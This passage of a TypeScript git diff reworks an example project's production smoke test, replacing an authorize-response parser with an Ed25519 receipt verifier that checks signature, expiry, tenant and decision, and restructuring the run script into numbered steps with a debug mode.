-    return {
-      ok: false,
-      error: `authorize network error: ${e instanceof Error ? e.message : String(e)}`,
-    };
+    return { ok: false, error: `authorize: network error: ${e instanceof Error ? e.message : String(e)}` };
   }
 
   if (!response.ok) {
     let detail = "";
     try {
-      const rb = (await response.json()) as Record<string, unknown>;
-      detail = typeof rb["message"] === "string" ? `: ${rb["message"]}` : "";
+      const b = (await response.json()) as Record<string, unknown>;
+      if (typeof b["message"] === "string") detail = `: ${b["message"]}`;
     } catch { /* ignore */ }
-    return { ok: false, error: `HTTP ${response.status} from prod authorize${detail}` };
+    return { ok: false, error: `authorize: HTTP ${response.status}${detail}` };
   }
 
   let raw: unknown;
-  try {
-    raw = (await response.json()) as unknown;
-  } catch {
-    return { ok: false, error: "could not parse authorize response as JSON" };
-  }
+  try { raw = await response.json() as unknown; }
+  catch { return { ok: false, error: "authorize: response is not valid JSON" }; }
 
   return { ok: true, raw };
 }
 
-// ─── Response shape validation ────────────────────────────────────────────────
+// ─── Receipt extraction ───────────────────────────────────────────────────────
+//
+// Accepts wrapped { "receipt": {...} } first, then top-level object.
+// verifySiftReceipt() (called by run-prod.ts) does full shape + crypto validation.
 
-interface ParsedArtifact {
-  version: string;
-  auth_id: string;
-  issuer: string;
-  audience: string;
-  decision: string;
-  intent_hash: string;
-  state_hash: string;
-  policy_id: string;
-  issued_at: number;
-  expires_at: number;
-  signature: { alg: string; kid: string; sig: string };
+export function extractRawReceipt(raw: unknown): unknown | null {
+  if (typeof raw !== "object" || raw === null) return null;
+  const r = raw as Record<string, unknown>;
+  if (typeof r["receipt"] === "object" && r["receipt"] !== null) return r["receipt"];
+  return raw;
 }
 
-function nonEmpty(v: unknown): v is string {
-  return typeof v === "string" && v.length > 0;
+// ─── Sift-native receipt verification ─────────────────────────────────────────
+
+export type SiftReceiptVerificationCode =
+  | "MALFORMED_RECEIPT"
+  | "MISSING_KEY_ID"
+  | "KEY_NOT_FOUND"
+  | "INVALID_PUBLIC_KEY"
+  | "TAMPERED_RECEIPT"
+  | "INVALID_SIGNATURE"
+  | "INVALID_SIGNATURE_ALG"
+  | "EXPIRED_RECEIPT"
+  | "TENANT_MISMATCH"
+  | "INVALID_POLICY_ID"
+  | "INVALID_DECISION"
+  | "DENY_DECISION"
+  | "VERIFICATION_ERROR";
+
+export type SiftReceiptVerificationResult =
+  | { ok: true; receipt: SiftReceipt }
+  | { ok: false; code: SiftReceiptVerificationCode; message: string };
+
+const ED25519_SPKI_PREFIX = Buffer.from("302a300506032b6570032100", "hex");
+
+function failSiftReceipt(
+  code: SiftReceiptVerificationCode,
+  message: string,
+): SiftReceiptVerificationResult {
+  return { ok: false, code, message };
 }
 
-/**
- * Validates and extracts the prod authorize response artifact.
- *
- * Accepts the same wire shape as staging: the artifact may be wrapped in an
- * "authorization" envelope or present at the top level.  Fails closed on any
- * missing or malformed field.
- */
-export function parseProdAuthorizeResponse(
-  raw: unknown,
-): ParsedArtifact | { error: string } {
-  const wrapper =
-    typeof raw === "object" && raw !== null
-      ? (raw as Record<string, unknown>)
-      : null;
-
-  const r =
-    wrapper?.["authorization"] !== undefined
-      ? wrapper["authorization"]
-      : raw;
-
-  if (typeof r !== "object" || r === null) {
-    return { error: "authorization field is not a JSON object" };
-  }
-  const a = r as Record<string, unknown>;
-
-  for (const k of [
-    "version", "auth_id", "issuer", "audience", "decision",
-    "intent_hash", "state_hash", "policy_id",
-  ] as const) {
-    if (!nonEmpty(a[k])) return { error: `missing or empty field: ${k}` };
-  }
-  if (typeof a["issued_at"]  !== "number") return { error: "missing issued_at" };
-  if (typeof a["expires_at"] !== "number") return { error: "missing expires_at" };
-
-  const sig = a["signature"];
-  if (typeof sig !== "object" || sig === null) return { error: "missing signature object" };
-  const s = sig as Record<string, unknown>;
-  for (const k of ["alg", "kid", "sig"] as const) {
-    if (!nonEmpty(s[k])) return { error: `missing signature.${k}` };
-  }
-
-  return {
-    version:     a["version"]     as string,
-    auth_id:     a["auth_id"]     as string,
-    issuer:      a["issuer"]      as string,
-    audience:    a["audience"]    as string,
-    decision:    a["decision"]    as string,
-    intent_hash: a["intent_hash"] as string,
-    state_hash:  a["state_hash"]  as string,
-    policy_id:   a["policy_id"]   as string,
-    issued_at:   a["issued_at"]   as number,
-    expires_at:  a["expires_at"]  as number,
-    signature: {
-      alg: s["alg"] as string,
-      kid: s["kid"] as string,
-      sig: s["sig"] as string,
-    },
-  };
+function asRecord(value: unknown): Record<string, unknown> | null {
+  return typeof value === "object" && value !== null && !Array.isArray(value)
+    ? value as Record<string, unknown>
+    : null;
 }
 
-// ─── JWKS/KRL verification ────────────────────────────────────────────────────
+function canonicalJson(value: unknown): string {
+  return JSON.stringify(deepSortKeys(value));
+}
 
-async function verifyWithProdKeyStore(
-  artifact: ParsedArtifact,
-  config: ProdConfig,
-): Promise<{ ok: true; keyRaw: Uint8Array } | { ok: false; error: string }> {
-  const keyStore = new SiftHttpKeyStore({
-    jwksUrl: config.jwksUrl,
-    krlUrl: config.krlUrl ?? PROD_KRL_URL,
+function publicKeyObjectFromRaw(raw: Buffer): ReturnType<typeof createPublicKey> {
+  if (raw.length !== 32) {
+    throw new TypeError(`Ed25519 public key must be 32 bytes, got ${raw.length}`);
+  }
+  return createPublicKey({
+    key: Buffer.concat([ED25519_SPKI_PREFIX, raw]),
+    format: "der",
+    type: "spki",
   });
-
-  try {
-    await keyStore.refresh();
-  } catch (e) {
-    return {
-      ok: false,
-      error: `prod key store refresh failed: ${e instanceof Error ? e.message : String(e)}`,
-    };
-  }
-
-  const { kid, sig } = artifact.signature;
-
-  if (await keyStore.isKidRevoked(kid)) {
-    return { ok: false, error: `signing key revoked: kid=${kid}` };
-  }
-
-  const keyRaw = await keyStore.getPublicKeyByKid(kid);
-  if (!keyRaw) {
-    return { ok: false, error: `unknown prod signing key: kid=${kid}` };
-  }
-
-  // Preimage: artifact with signature.sig absent.
-  // signature.alg and signature.kid must remain — AuthorizationV1 contract.
-  const preimage = {
-    version:     artifact.version,
-    auth_id:     artifact.auth_id,
-    issuer:      artifact.issuer,
-    audience:    artifact.audience,
-    decision:    artifact.decision,
-    intent_hash: artifact.intent_hash,
-    state_hash:  artifact.state_hash,
-    policy_id:   artifact.policy_id,
-    issued_at:   artifact.issued_at,
-    expires_at:  artifact.expires_at,
-    signature:   { alg: artifact.signature.alg, kid: artifact.signature.kid },
-  };
-
-  if (!verifyCanonical(preimage, sig, Buffer.from(keyRaw))) {
-    return { ok: false, error: "Ed25519 signature verification failed (prod key)" };
-  }
-
-  return { ok: true, keyRaw };
 }
 
-// ─── Main prod authorize ──────────────────────────────────────────────────────
-
-/**
- * Full production authorization path:
- *   1. Fetch nonce from /api/v1/auth/challenge
- *   2. Build authorize request body with intent_hash + state_hash + nonce
- *   3. Sign request body with agent Ed25519 private key
- *   4. POST signed body to /api/v1/authorize
- *   5. Parse response shape (unwrap "authorization" envelope)
- *   6. Verify Ed25519 signature via prod JWKS/KRL
- *   7. Verify hash binding (response hashes match local computation)
- *   8. Return verified result; populate allowArtifact only if decision=ALLOW
- *
- * Fails closed: any step failure returns { ok: false }.
- * allowArtifact (when present) is NOT execution authorization — it must
- * still pass pepVerify() before anything executes.
- */
-export async function prodAuthorize(
-  intent: OxDeAIIntent,
-  state: NormalizedState,
-  decision: string,
-  policyId: string,
-  config: ProdConfig,
-): Promise<ProdAuthorizeResult> {
-  // 1. Fetch challenge nonce
-  const challengeResult = await fetchProdChallenge(config);
-  if (!challengeResult.ok) {
-    return { ok: false, error: challengeResult.error };
+function requireString(
+  obj: Record<string, unknown>,
+  field: string,
+): string | { error: SiftReceiptVerificationResult } {
+  const value = obj[field];
+  if (typeof value !== "string" || value.length === 0) {
+    return { error: failSiftReceipt("MALFORMED_RECEIPT", `receipt missing field: ${field}`) };
   }
-  const { nonce } = challengeResult;
+  return value;
+}
 
-  // 2. Build unsigned request body (includes intent_hash + state_hash)
-  const unsignedBody = buildProdAuthorizeUnsignedBody(
-    intent, state, decision, policyId, nonce, config,
-  );
-
-  // 3. Sign with agent's Ed25519 private key
-  const signedBody = signAuthorizeRequest(unsignedBody, config.privateKeyPem);
-
-  // 4. POST to prod authorize
-  const callResult = await callProdAuthorize(signedBody, config);
-  if (!callResult.ok) return { ok: false, error: callResult.error };
-
-  // 5. Shape validation
-  const parsed = parseProdAuthorizeResponse(callResult.raw);
-  if ("error" in parsed) {
-    return { ok: false, error: `malformed prod response: ${parsed.error}` };
+function requireNumber(
+  obj: Record<string, unknown>,
+  field: string,
+): number | { error: SiftReceiptVerificationResult } {
+  const value = obj[field];
+  if (typeof value !== "number" || !Number.isSafeInteger(value)) {
+    return { error: failSiftReceipt("MALFORMED_RECEIPT", `receipt field ${field} must be a safe integer`) };
   }
+  return value;
+}
 
-  // 6. JWKS/KRL + Ed25519 signature verification
-  const verifyResult = await verifyWithProdKeyStore(parsed, config);
-  if (!verifyResult.ok) return { ok: false, error: verifyResult.error };
+function receiptString(
+  obj: Record<string, unknown>,
+  field: string,
+  fallback = "",
+): string {
+  const value = obj[field];
+  return typeof value === "string" && value.length > 0 ? value : fallback;
+}
 
-  // 7. Hash binding — proves Sift signed over the exact intent/state we sent
-  const localIntentHash = canonicalHash(intent);
-  const localStateHash  = canonicalHash(state);
+function receiptNumber(
+  obj: Record<string, unknown>,
+  field: string,
+  fallback = 0,
+): number {
+  const value = obj[field];
+  return typeof value === "number" && Number.isSafeInteger(value) ? value : fallback;
+}
 
-  if (parsed.intent_hash !== localIntentHash) {
-    return {
-      ok: false,
-      error: `intent_hash mismatch: local=${localIntentHash} remote=${parsed.intent_hash}`,
-    };
-  }
-  if (parsed.state_hash !== localStateHash) {
-    return {
-      ok: false,
-      error: `state_hash mismatch: local=${localStateHash} remote=${parsed.state_hash}`,
-    };
-  }
-
-  // 8. Return verified result; allowArtifact only when ALLOW
-  const allowArtifact: AuthorizationV1Payload | null =
-    parsed.decision === "ALLOW"
-      ? {
-          version:     "AuthorizationV1",
-          auth_id:     parsed.auth_id,
-          issuer:      parsed.issuer,
-          audience:    parsed.audience,
-          decision:    "ALLOW",
-          intent_hash: parsed.intent_hash,
-          state_hash:  parsed.state_hash,
-          policy_id:   parsed.policy_id,
-          issued_at:   parsed.issued_at,
-          expires_at:  parsed.expires_at,
-          signature: {
-            alg: "ed25519",
-            kid: parsed.signature.kid,
-            sig: parsed.signature.sig,
-          },
-        }
-      : null;
-
+function toOxDeAIReceipt(receipt: Record<string, unknown>): SiftReceipt {
   return {
-    ok: true,
-    decision:     parsed.decision,
-    auth_id:      parsed.auth_id,
-    policy_id:    parsed.policy_id,
-    issuer:       parsed.issuer,
-    signingKeyRaw: verifyResult.keyRaw,
-    allowArtifact,
+    receipt_version: receiptString(receipt, "receipt_version", "1.0"),
+    tenant_id: receiptString(receipt, "tenant_id"),
+    agent_id: receiptString(receipt, "agent_id"),
+    action: receiptString(receipt, "action"),
+    tool: receiptString(receipt, "tool"),
+    decision: receipt["decision"] === "ALLOW" ? "ALLOW" : "DENY",
+    risk_tier: receiptNumber(receipt, "risk_tier"),
+    timestamp: receiptString(receipt, "timestamp", new Date(receiptNumber(receipt, "issued_at") * 1000).toISOString()),
+    nonce: receiptString(receipt, "nonce", receiptString(receipt, "request_id")),
+    policy_matched: receiptString(receipt, "policy_hash"),
+    receipt_hash: receiptString(receipt, "receipt_hash", createHash("sha256").update(receiptString(receipt, "canonical_payload")).digest("hex")),
+    signature: receiptString(receipt, "signature"),
   };
+}
+
+function selectVerifyKey(
+  verifyKeyResponse: unknown,
+  keyId: string,
+): { ok: true; publicKeyRaw: Buffer } | { ok: false; result: SiftReceiptVerificationResult } {
+  const raw = asRecord(verifyKeyResponse);
+  if (raw === null) {
+    return { ok: false, result: failSiftReceipt("KEY_NOT_FOUND", "verify-key response is not a JSON object") };
+  }
+
+  const keys = asRecord(raw["keys"]);
+  if (keys === null) {
+    return { ok: false, result: failSiftReceipt("KEY_NOT_FOUND", "verify-key response missing field: keys") };
+  }
+
+  const encoded = keys[keyId];
+  if (typeof encoded !== "string" || encoded.length === 0) {
+    return { ok: false, result: failSiftReceipt("KEY_NOT_FOUND", `verify-key response missing key_id: ${keyId}`) };
+  }
+
+  const publicKeyRaw = b64uDecode(encoded);
+  if (publicKeyRaw.length !== 32) {
+    return {
+      ok: false,
+      result: failSiftReceipt("INVALID_PUBLIC_KEY", `verify-key public key for key_id "${keyId}" must decode to 32 bytes, got ${publicKeyRaw.length}`),
+    };
+  }
+
+  return { ok: true, publicKeyRaw };
+}
+
+export function verifySiftReceipt(
+  receipt: unknown,
+  verifyKeyResponse: unknown,
+  expectedTenant: string,
+): SiftReceiptVerificationResult {
+  try {
+    const r = asRecord(receipt);
+    if (r === null) {
+      return failSiftReceipt("MALFORMED_RECEIPT", "receipt must be a JSON object");
+    }
+
+    const keyIdValue = requireString(r, "key_id");
+    if (typeof keyIdValue !== "string") return keyIdValue.error;
+    const keyId = keyIdValue;
+
+    const canonicalPayloadValue = requireString(r, "canonical_payload");
+    if (typeof canonicalPayloadValue !== "string") return canonicalPayloadValue.error;
+    const canonicalPayload = canonicalPayloadValue;
+
+    const signatureValue = requireString(r, "signature");
+    if (typeof signatureValue !== "string") return signatureValue.error;
+    const signature = signatureValue;
+
+    const expiryValue = requireNumber(r, "expiry");
+    if (typeof expiryValue !== "number") return expiryValue.error;
+    const expiry = expiryValue;
+
+    const tenantIdValue = requireString(r, "tenant_id");
+    if (typeof tenantIdValue !== "string") return tenantIdValue.error;
+    const tenantId = tenantIdValue;
+
+    const decisionValue = requireString(r, "decision");
+    if (typeof decisionValue !== "string") return decisionValue.error;
+    const decision = decisionValue;
+
+    const policyHashValue = requireString(r, "policy_hash");
+    if (typeof policyHashValue !== "string") {
+      return failSiftReceipt("INVALID_POLICY_ID", "receipt missing field: policy_hash");
+    }
+
+    const signatureAlg = r["signature_alg"];
+    if (signatureAlg !== "ed25519") {
+      return failSiftReceipt("INVALID_SIGNATURE_ALG", `signature_alg must be "ed25519", got: ${String(signatureAlg)}`);
+    }
+
+    const { signature: _sig, canonical_payload: _payload, ...base } = r;
+    if (canonicalJson(base) !== canonicalPayload) {
+      return failSiftReceipt("TAMPERED_RECEIPT", "canonical_payload does not match receipt body");
+    }
+
+    const key = selectVerifyKey(verifyKeyResponse, keyId);
+    if (!key.ok) return key.result;
+
+    const signatureBytes = b64uDecode(signature);
+    const publicKey = publicKeyObjectFromRaw(key.publicKeyRaw);
+    const signatureOk = nodeCryptoVerify(
+      null,
+      Buffer.from(canonicalPayload, "utf8"),
+      publicKey,
+      signatureBytes,
+    );
+    if (!signatureOk) {
+      return failSiftReceipt("INVALID_SIGNATURE", "receipt signature verification failed");
+    }
+
+    if (Math.floor(Date.now() / 1000) > expiry) {
+      return failSiftReceipt("EXPIRED_RECEIPT", "receipt has expired");
+    }
+
+    if (tenantId !== expectedTenant) {
+      return failSiftReceipt("TENANT_MISMATCH", `receipt tenant_id "${tenantId}" does not match expected tenant`);
+    }
+
+    if (decision !== "ALLOW" && decision !== "DENY") {
+      return failSiftReceipt("INVALID_DECISION", `receipt decision must be ALLOW or DENY, got: ${decision}`);
+    }
+
+    if (decision !== "ALLOW") {
+      return failSiftReceipt("DENY_DECISION", "receipt decision is not ALLOW");
+    }
+
+    return { ok: true, receipt: toOxDeAIReceipt(r) };
+  } catch (e) {
+    return failSiftReceipt("VERIFICATION_ERROR", e instanceof Error ? e.message : String(e));
+  }
+}
+
+export async function fetchProdVerifyKey(
+  config: ProdConfig,
+): Promise<{ ok: true; raw: unknown } | { ok: false; error: string }> {
+  const url = config.verifyKeyUrl ?? PROD_VERIFY_KEY_URL;
+
+  let response: Response;
+  try {
+    response = await fetch(url, {
+      method: "GET",
+      headers: { "X-Sift-Tenant": config.tenantId },
+    });
+  } catch (e) {
+    return { ok: false, error: `verify-key: network error: ${e instanceof Error ? e.message : String(e)}` };
+  }
+
+  if (!response.ok) {
+    return { ok: false, error: `verify-key: HTTP ${response.status}` };
+  }
+
+  let raw: unknown;
+  try { raw = await response.json() as unknown; }
+  catch { return { ok: false, error: "verify-key: response is not valid JSON" }; }
+
+  return { ok: true, raw };
 }

--- a/examples/sift/src/run-prod.ts
+++ b/examples/sift/src/run-prod.ts
@@ -1,358 +1,340 @@
 // SPDX-License-Identifier: Apache-2.0
 /**
- * OxDeAI Sift Production Smoke Test
+ * OxDeAI Sift Production Smoke Test — ALLOW path + OxDeAI PEP replay check.
  *
- * Runs three scenarios against the real Sift production infrastructure:
- *
- *   LIVE (requires network — Sift signs each response):
- *     Scenario 1 — PROD ALLOW  : low-risk read, PEP allows execution
- *     Scenario 2 — PROD DENY   : credential exfil attempt, blocked before PEP
- *     Scenario 3 — PROD REPLAY : REPLAY-decision artifact, blocked before PEP
- *                  + LOCAL REPLAY CHECK: reuse ALLOW artifact from Scenario 1
- *                    through OxDeAI PEP in-memory replay store
- *
- *   LOCAL:
- *     pepVerify() — OxDeAI PEP enforcement, in-memory replay store
- *
- * Architectural invariants demonstrated:
- *   - Agent signs each request (challenge → nonce → signed request body)
- *   - Sift decides   (live signed artifact from the prod authorize endpoint)
- *   - OxDeAI enforces at the PEP boundary  (pepVerify checks every field)
- *   - A valid Sift signature alone does NOT execute anything
- *   - Non-ALLOW decisions are blocked before pepVerify is ever reached
- *   - The PEP enforces replay protection regardless of artifact freshness
- *
- * Prerequisites:
- *   All PLACEHOLDER fields below must be filled before prod can run.
- *   See "Required from Jason" section in README.md.
+ * Seven numbered steps, each printed OK or FAIL before the next runs.
+ * Stops immediately on any failure.
  *
  * Run:
  *   pnpm -C examples/sift start:prod
+ *
+ * Debug mode (prints intermediate values at each step, never prints key material):
+ *   SIFT_PROD_DEBUG=1 pnpm -C examples/sift start:prod
+ *
+ * Prerequisites (see README.md "Production smoke test"):
+ *   - Private key:  .local/keys/oxdeai-prod-agent-ed25519-private.pem
+ *   - Public key x: .local/keys/oxdeai-prod-agent-ed25519-public.x.txt
+ *   or set SIFT_PROD_PRIVATE_KEY_PATH
  */
 
 import { resolve } from "node:path";
 import { readFileSync } from "node:fs";
-import { normalizeState } from "@oxdeai/sift";
-import type { OxDeAIIntent, NormalizedState, AuthorizationV1Payload } from "@oxdeai/sift";
-import { pepVerify } from "./helpers.js";
+
+import {
+  normalizeIntent,
+  normalizeState,
+  receiptToAuthorization,
+} from "@oxdeai/sift";
+
+import { pepVerify, signAuthorization, decodeJwksX } from "./helpers.js";
+
 import {
   loadProdPrivateKey,
-  prodAuthorize,
-  PROD_AUTHORIZE_URL,
+  fetchProdChallenge,
+  buildProdAuthorizeRequest,
+  buildProdAuthorizeRequestDebug,
+  callProdAuthorize,
+  extractRawReceipt,
+  fetchProdVerifyKey,
+  verifySiftReceipt,
   PROD_CHALLENGE_URL,
-  PROD_KRL_URL,
-  PROD_JWKS_URL_PLACEHOLDER,
+  PROD_AUTHORIZE_URL,
+  PROD_VERIFY_KEY_URL,
   type ProdConfig,
-  type ProdAuthorizeResult,
+  type ProdAuthorizeRequest,
 } from "./liveProd.js";
 
-// ─── Output helpers ───────────────────────────────────────────────────────────
+// ─── Debug helper ─────────────────────────────────────────────────────────────
 
-function step(msg: string): void { console.log(`  ${msg}`); }
-function blank(): void           { console.log(); }
+const DEBUG = process.env["SIFT_PROD_DEBUG"] === "1";
 
-// ─── Config ───────────────────────────────────────────────────────────────────
-//
-// PLACEHOLDERS — fill all values before running prod.
-// Values marked "from Jason" must be obtained from Jason before prod can run.
-
-// Path to the agent's Ed25519 private key (PKCS8 PEM, never committed).
-// Override via SIFT_PROD_PRIVATE_KEY_PATH env var.
-const PRIVATE_KEY_PATH = process.env["SIFT_PROD_PRIVATE_KEY_PATH"]
-  ?? resolve(process.cwd(), ".local/keys/oxdeai-prod-agent-ed25519-private.pem");
-
-// PLACEHOLDER: Load the agent's public key x value from the known file for logging.
-// This never affects crypto — it is only printed at startup for confirmation.
-const PUBLIC_KEY_X_PATH = resolve(
-  process.cwd(),
-  ".local/keys/oxdeai-prod-agent-ed25519-public.x.txt",
-);
-
-// ─── Runtime config guard ─────────────────────────────────────────────────────
-
-function assertNotPlaceholder(value: string, name: string): void {
-  if (value.startsWith("PLACEHOLDER_") || value === "") {
-    console.error(`  ERROR: ${name} is not set — fill in run-prod.ts before running prod`);
-    process.exit(1);
+function dbg(label: string, value: unknown): void {
+  if (!DEBUG) return;
+  const rendered =
+    typeof value === "string"
+      ? value
+      : JSON.stringify(value, null, 2);
+  console.log(`  [debug] ${label}:`);
+  for (const line of rendered.split("\n")) {
+    console.log(`    ${line}`);
   }
 }
 
-// ─── Build config ─────────────────────────────────────────────────────────────
+// ─── Local constants ──────────────────────────────────────────────────────────
+
+const PEP_AUDIENCE  = "oxdeai-pep-prod";
+const ISSUER        = "oxdeai-prod-smoke";
+const ISSUER_KEY_ID = "oxdeai-prod-agent-key";
+
+// ─── Key material ─────────────────────────────────────────────────────────────
+
+const PRIVATE_KEY_PATH = process.env["SIFT_PROD_PRIVATE_KEY_PATH"]
+  ?? resolve(process.cwd(), ".local/keys/oxdeai-prod-agent-ed25519-private.pem");
 
 let privateKeyPem: string;
 try {
   privateKeyPem = loadProdPrivateKey(PRIVATE_KEY_PATH);
 } catch (e) {
-  console.error(`  ERROR: ${e instanceof Error ? e.message : String(e)}`);
-  console.error(`  Set SIFT_PROD_PRIVATE_KEY_PATH or place the key at:`);
-  console.error(`    ${PRIVATE_KEY_PATH}`);
+  console.error(`ERROR: ${e instanceof Error ? e.message : String(e)}`);
+  console.error(`Place the key at: ${PRIVATE_KEY_PATH}`);
+  console.error(`or set: SIFT_PROD_PRIVATE_KEY_PATH`);
   process.exit(1);
 }
 
-let publicKeyX = "(not loaded)";
+let publicKeyX = "";
 try {
-  publicKeyX = readFileSync(PUBLIC_KEY_X_PATH, "utf8").trim();
-} catch { /* non-fatal — only used for log output */ }
+  publicKeyX = readFileSync(
+    resolve(process.cwd(), ".local/keys/oxdeai-prod-agent-ed25519-public.x.txt"),
+    "utf8",
+  ).trim();
+} catch {
+  console.error(
+    "ERROR: public key x not found at " +
+    ".local/keys/oxdeai-prod-agent-ed25519-public.x.txt\n" +
+    "  This file must contain the base64url-encoded raw 32-byte Ed25519 public key."
+  );
+  process.exit(1);
+}
 
-// PLACEHOLDER: Replace all PLACEHOLDER_ values with real prod values from Jason.
-const prodConfig: ProdConfig = {
-  tenantId:     "PLACEHOLDER_PROD_TENANT_ID",      // from Jason
-  agentId:      "PLACEHOLDER_PROD_AGENT_ID",       // from Jason
-  agentRole:    undefined,                          // from Jason (set if required by prod policy)
-  audience:     "PLACEHOLDER_PROD_AUDIENCE",       // from Jason (e.g. "oxdeai-pep-prod")
-  jwksUrl:      PROD_JWKS_URL_PLACEHOLDER,          // from Jason
-  krlUrl:       PROD_KRL_URL,
-  challengeUrl: PROD_CHALLENGE_URL,
-  authorizeUrl: PROD_AUTHORIZE_URL,
+let issuerPublicKeyRaw: Buffer;
+try {
+  issuerPublicKeyRaw = decodeJwksX(publicKeyX);
+} catch (e) {
+  console.error(`ERROR: failed to decode public key x: ${e instanceof Error ? e.message : String(e)}`);
+  process.exit(1);
+}
+
+// ─── Config ───────────────────────────────────────────────────────────────────
+
+const config: ProdConfig = {
+  tenantId:    "oxdeai_designpartner",
+  agentId:     "oxdeai-boundary-demo-01",
+  agentRole:   "validation_agent",
   privateKeyPem,
   publicKeyX,
-  publicKeyKid: "PLACEHOLDER_PROD_AGENT_KID",     // from Jason
+  challengeUrl: PROD_CHALLENGE_URL,
+  authorizeUrl: PROD_AUTHORIZE_URL,
+  verifyKeyUrl: PROD_VERIFY_KEY_URL,
 };
 
-// PLACEHOLDER: Replace with real prod policy IDs from Jason.
-const POLICY_ALLOW  = "PLACEHOLDER_PROD_POLICY_ALLOW";   // low-risk allow policy
-const POLICY_DENY   = "PLACEHOLDER_PROD_POLICY_DENY";    // exfil block policy
-const POLICY_REPLAY = "PLACEHOLDER_PROD_POLICY_REPLAY";  // replay-window policy
+// ─── Smoke scenario params ────────────────────────────────────────────────────
 
-// Abort if any placeholder was not replaced
-assertNotPlaceholder(prodConfig.tenantId,  "prodConfig.tenantId");
-assertNotPlaceholder(prodConfig.agentId,   "prodConfig.agentId");
-assertNotPlaceholder(prodConfig.audience,  "prodConfig.audience");
-assertNotPlaceholder(prodConfig.jwksUrl,   "prodConfig.jwksUrl");
-assertNotPlaceholder(POLICY_ALLOW,         "POLICY_ALLOW");
-assertNotPlaceholder(POLICY_DENY,          "POLICY_DENY");
-assertNotPlaceholder(POLICY_REPLAY,        "POLICY_REPLAY");
-
-// ─── Shared state ─────────────────────────────────────────────────────────────
-
-const stateNorm = normalizeState({
-  state: { agent: prodConfig.agentId, session_active: true },
-  requiredKeys: [],
-});
-if (!stateNorm.ok) {
-  console.error(`  state normalization failed: ${stateNorm.code}`);
-  process.exit(1);
-}
-const sharedState: NormalizedState = stateNorm.state;
-
-// ─── Scenario helpers ─────────────────────────────────────────────────────────
-
-/**
- * Runs the ALLOW smoke scenario end-to-end.
- *
- * Returns the verified ALLOW artifact and signing key raw bytes so the caller
- * can subsequently run runProdPepReplayCheck using the same artifact.
- */
-export async function runProdSmokeAllow(
-  intent: OxDeAIIntent,
-  state: NormalizedState,
-  policyId: string,
-  config: ProdConfig,
-): Promise<{ allowArtifact: AuthorizationV1Payload; signingKeyRaw: Uint8Array } | null> {
-  const result = await prodAuthorize(intent, state, "ALLOW", policyId, config);
-
-  if (!result.ok) {
-    step(`authorize call: FAILED — ${result.error}`);
-    step("executed: false");
-    blank();
-    return null;
-  }
-
-  step("authorize call: OK");
-  step("challenge + request signing: OK");
-  step("prod JWKS/KRL verification: OK");
-  step("hash binding: OK");
-  step(`auth_id:       ${result.auth_id}`);
-  step(`issuer:        ${result.issuer}`);
-  step(`policy:        ${result.policy_id}`);
-  step(`sift decision: ${result.decision}`);
-
-  const { allowArtifact, signingKeyRaw } = result;
-
-  if (!allowArtifact) {
-    step("pep decision: DENY (Sift returned non-ALLOW)");
-    step("executed: false");
-    blank();
-    return null;
-  }
-
-  const pep = pepVerify({
-    authorization: allowArtifact,
-    intent,
-    state,
-    audience: config.audience,
-    issuerPublicKeyRaw: Buffer.from(signingKeyRaw),
-    now: new Date(),
-  });
-
-  step(`pep decision: ${pep.decision}`);
-  step(`executed: ${String(pep.executed)}`);
-  if (!pep.ok) step(`reason: ${pep.reason}`);
-  blank();
-
-  if (!pep.ok) return null;
-  return { allowArtifact, signingKeyRaw };
-}
-
-/**
- * Replays the given ALLOW artifact through the PEP to demonstrate in-memory
- * replay protection.  No network call is made.
- *
- * The PEP replay store already recorded auth_id during runProdSmokeAllow;
- * pepVerify returns DENY with reason=REPLAY.
- */
-export function runProdPepReplayCheck(
-  allowArtifact: AuthorizationV1Payload,
-  intent: OxDeAIIntent,
-  state: NormalizedState,
-  signingKeyRaw: Uint8Array,
-  config: ProdConfig,
-): void {
-  step("(live ALLOW artifact reused — no additional network call)");
-
-  const pep = pepVerify({
-    authorization: allowArtifact,
-    intent,
-    state,
-    audience: config.audience,
-    issuerPublicKeyRaw: Buffer.from(signingKeyRaw),
-    now: new Date(),
-  });
-
-  step(`authorization reused: auth_id=${allowArtifact.auth_id}`);
-  step(`pep decision: ${pep.decision}`);
-  if (!pep.ok) step(`reason: ${pep.reason}`);
-  step(`executed: ${String(pep.executed)}`);
-  blank();
-}
+const action   = "read";
+const tool     = "web.search";
+const riskTier = 1;
+const params: Record<string, unknown> = { query: "site:oxdeai.com" };
 
 // ─────────────────────────────────────────────────────────────────────────────
 
-console.log("OxDeAI Sift Production Smoke Test");
-blank();
-console.log("Prod surfaces:");
-step(`challenge:  ${prodConfig.challengeUrl ?? PROD_CHALLENGE_URL}`);
-step(`authorize:  ${prodConfig.authorizeUrl ?? PROD_AUTHORIZE_URL}`);
-step(`JWKS:       ${prodConfig.jwksUrl}`);
-step(`KRL:        ${prodConfig.krlUrl ?? PROD_KRL_URL}`);
-blank();
-console.log("Agent identity:");
-step(`tenant_id:  ${prodConfig.tenantId}`);
-step(`agent_id:   ${prodConfig.agentId}`);
-if (prodConfig.agentRole) step(`agent_role: ${prodConfig.agentRole}`);
-step(`key x:      ${publicKeyX}`);
-if (prodConfig.publicKeyKid) step(`key kid:    ${prodConfig.publicKeyKid}`);
-blank();
+console.log("OxDeAI Sift Prod Smoke Test");
+if (DEBUG) console.log("  [debug] SIFT_PROD_DEBUG=1 — verbose output enabled");
+console.log();
 
-// ═══════════════════════════════════════════════════════════════════════════
-// Scenario 1 — PROD ALLOW
-//
-// Intent: read /etc/hostname (low-risk file read).
-// Full path:
-//   POST challenge → nonce
-//   sign request → POST authorize → JWKS/KRL → Ed25519 verify → OxDeAI PEP
-// ═══════════════════════════════════════════════════════════════════════════
+// ── [1] Challenge ─────────────────────────────────────────────────────────────
 
-console.log("Scenario 1 — PROD ALLOW");
+const challengeResult = await fetchProdChallenge(config);
+if (!challengeResult.ok) {
+  console.log(`[1] challenge: FAIL — ${challengeResult.error}`);
+  process.exit(1);
+}
+console.log("[1] challenge: OK");
+dbg("challenge response shape", challengeResult.rawShape ?? {});
+const nonce = challengeResult.nonce;
 
-const allowIntent: OxDeAIIntent = {
-  type: "EXECUTE",
-  tool: "read_file",
-  params: { path: "/etc/hostname", mode: "ro" },
-};
+// ── [2] Request signing ───────────────────────────────────────────────────────
 
-const smokeResult = await runProdSmokeAllow(
-  allowIntent, sharedState, POLICY_ALLOW, prodConfig,
-);
+let request: ProdAuthorizeRequest;
+try {
+  if (DEBUG) {
+    const d = buildProdAuthorizeRequestDebug(action, tool, riskTier, params, nonce, config);
+    request = d.request;
+    dbg("unsigned request body (params included, signature omitted)", {
+      ...d.request,
+      signature: "(computed below)",
+    });
